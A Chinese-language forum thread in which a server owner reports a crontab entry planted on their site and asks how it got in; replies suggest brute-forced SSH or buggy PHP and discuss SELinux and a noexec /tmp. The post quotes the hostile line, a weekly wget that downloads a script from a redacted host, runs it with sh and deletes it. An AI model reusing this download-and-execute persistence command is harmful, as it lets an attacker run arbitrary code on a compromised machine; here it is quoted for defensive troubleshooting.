我的站台的crontab 被寫入
@weekly wget http://x/bots/regulat.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh > /dev/null 2&1
目前已知不影響主機，因為URL已經失效了。
PS.貼出來的URL已經處理過了，domain我改成x，以防被誤點。
但實在找不出他植入的方法，有人知道嗎？

這個還要查看其他點會比較好知道是哪邊引起的常見比方帳號密碼被猜中這種暴力 ssh 登入進來的或者是跑的 php 程式碼有問題這類題外話若你是安裝 rh-based 的版本有開 selinux 的話通常最後會因為 policy 設定不會允許 /tmp 內檔案執行在 web server 環境上面的話比較能夠減少後續問題

這個還要查看其他點會比較好知道是哪邊引起的常見比方帳號密碼被猜中這種暴力 ssh 登入進來的或者是跑的 php 程式碼有問題這類題外話若你是安裝 rh-based 的版本有開 selinux 的話通常最後會因為 policy 設定不會允許 /tmp 內檔案執行在 web server 環境上面的話比較能夠減少後續問題

sh /tmp/sh不就愛幹嘛幹嘛了嗎？他從regulat.bot抓下來

/tmp 可以用 -o noexec 防止 sh /tmp/sh

樓上 那是shell的行為 不是所有shell都會檢查的

noexec 比較適合於 binary 檔案，script 似乎就......